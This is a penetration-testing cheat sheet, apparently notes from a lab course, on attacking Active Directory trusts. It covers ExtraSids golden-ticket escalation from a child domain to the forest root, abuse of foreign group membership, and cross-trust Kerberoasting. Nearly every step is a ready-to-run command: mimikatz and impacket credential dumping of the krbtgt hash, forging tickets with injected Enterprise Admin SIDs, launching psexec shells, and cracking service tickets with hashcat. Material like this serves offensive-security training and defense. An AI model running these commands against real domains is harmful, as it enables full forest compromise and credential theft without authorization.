Attacking Domain Trusts

Last updated 2 months ago

Was this helpful?

Attacking Domain Trusts

ExtraSids

This attack allows for the compromise of a parent domain once the child domain has been compromised. The sidHistory attribute is used in migration scenarios. If a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID will be added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain. An attacker can perform SID history injection (due to a lack of SID Filtering protection) and add an administrator account to the SID History attribute of an account they control in the child domain. When logging in with this account, all of the SIDs associated with the account are added to the user's token. This token is used to determine what resources the account can access.

We need:

FQDN - child domain
KRBTGT hash - child domain
SID - child domain
USER - child domain (does not need to exist)
SID Enterprise Admin group - root domain

Locally - Windows

2 - 3 with (Since we have compromised the child domain, we can log in as a Domain Admin or similar and perform the DCSync attack to obtain the NT hash for the KRBTGT account)

lsadump::dcsync /user:<CHILD_DOMAIN>\krbtgt
# take note of Domain SID (Security ID - Relative ID)

3 - 5 with or PowerView

Get-DomainSID

Get-DomainGroup -Domain <DOMAIN> -Identity "Enterprise Admins" | select distinguishedname,objectsid

5 with cmdlet Get-ADGroup

Get-ADGroup -Identity "Enterprise Admins" -Server "<DOMAIN>"

With , create a Golden Ticket to access all resources within the parent domain

mimikatz.exe
> kerberos::golden /user:<NEW_USER> /domain:<FQDN_CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /krbtgt:<HASH> /sids:<ENTERPRISE_ADMIN_SID> /ptt

check

klist
ls \\<MACHINE_DC>.<DOMAIN_ROOT>\c$

With , create a Golden Ticket to access all resources within the parent domain

.\Rubeus.exe golden /rc4:<HASH> /domain:<FQDN_CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID>  /sids:<ENTERPRISE_ADMIN_SID> /user:<NEW_USER> /ptt

check

klist
ls \\<MACHINE_DC>.<DOMAIN_ROOT>\c$

Remotely - Linux

secretsdump.py <FULL_CHILD_DOMAIN>/<USER>@<DC> -just-dc-user <CHILD_DOMAIN>/krbtgt
# secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

lookupsid.py <FULL_CHILD_DOMAIN>/<USER>@<DC_CHILD> | grep "Domain SID"

lookupsid.py <FULL_CHILD_DOMAIN>/<USER>@<DC_ROOT> | grep "Domain SID"
lookupsid.py <FULL_CHILD_DOMAIN>/<USER>@<DC_ROOT> | grep "Enterprise Admins"
# <Domain_SID>-<RID_EnterpriseAdmin>

ticketer.py -nthash <HASH> -domain <FULL_CHILD_DOMAIN> -domain-sid <CHILD_DOMAIN_SID> -extra-sid <ROOT_EnterpriseAdmin_SID> <NEW_USER>

Now import the ticket and use it

export KRB5CCNAME=<PATH_TO_FILE>.ccache

psexec.py <FULL_CHILD_DOMAIN>/<NEW_USER>@<MACHINE_NAME>.<DOMAIN> -k -no-pass -target-ip <MACHINE_IP>

raiseChild.py -target-exec <MACHINE_IP> <FULL_CHILD_DOMAIN>/<USER_ADMIN>

Workflow

Input:

Child-domain Admin credentials (password, hashes or aesKey) in the form of 'domain/username[:password]' The domain specified MUST be the domain FQDN.
Optionally a pathname to save the generated golden ticket (-w switch)
Optionally a target-user RID to get credentials (-targetRID switch) Administrator by default.
Optionally a target to PSEXEC with the target-user privileges to (-target-exec switch). Enterprise Admin by default.

Process:

Find out where the child domain controller is located and get its info (via [MS-NRPC])
Find out what the forest FQDN is (via [MS-NRPC])
Get the forest's Enterprise Admin SID (via [MS-LSAT])
Get the child domain's krbtgt credentials (via [MS-DRSR])
Create a Golden Ticket specifying SID from 3) inside the KERB_VALIDATION_INFO's ExtraSids array and setting expiration 10 years from now
Use the generated ticket to log into the forest and get the target user info (krbtgt/admin by default)
If file was specified, save the golden ticket in ccache format
If target was specified, a PSEXEC shell is launched

Output:

Target user credentials (Forest's krbtgt/admin credentials by default)
A golden ticket saved in ccache for future fun and profit
PSExec Shell with the target-user privileges (Enterprise Admin privileges by default) at target-exec parameter.

Foreign Group Membership

We may see users or admins from Domain A as members of a group in Domain B. Only Domain Local Groups allow security principals from outside its forest. We may see a Domain Admin or Enterprise Admin from Domain A as a member of the built-in Administrators group in Domain B in a bidirectional forest trust relationship. If we can take over this admin user in Domain A, we would gain full administrative access to Domain B based on group membership.

Get-DomainForeignGroupMember -Domain <DOMAIN_TARGET>
# take note of MemberName

Convert-SidToName <MemberName>

Now we can verify the access to the target domain using the Enter-PSSession cmdlet to connect over WinRM.

Enter-PSSession -ComputerName <PC_NAME>.<TARGET_DOMAIN> -Credential <OUTPUT_Convert-SidToName>

Kerberoasting

Domain with an inbound or bidirectional domain/forest trust

Get-DomainUser -Domain <TARGET_DOMAIN> |select samaccountname,memberof

.\Rubeus.exe kerberoast /domain:<TARGET_DOMAIN> /user:<SPN> /nowrap

Offline cracking of output with hashcat (-m 13100)

GetUserSPNs.py -target-domain <TARGET_DOMAIN> <DOMAIN>/<USER>

Rerunning the command with the -request flag added gives us the TGS ticket.

GetUserSPNs.py -request -target-domain <TARGET_DOMAIN> <DOMAIN>/<USER> [-outputfile <OUTPUT FILE>]

Offline cracking of output with hashcat (-m 13100)

Last updated 2 months ago

Was this helpful?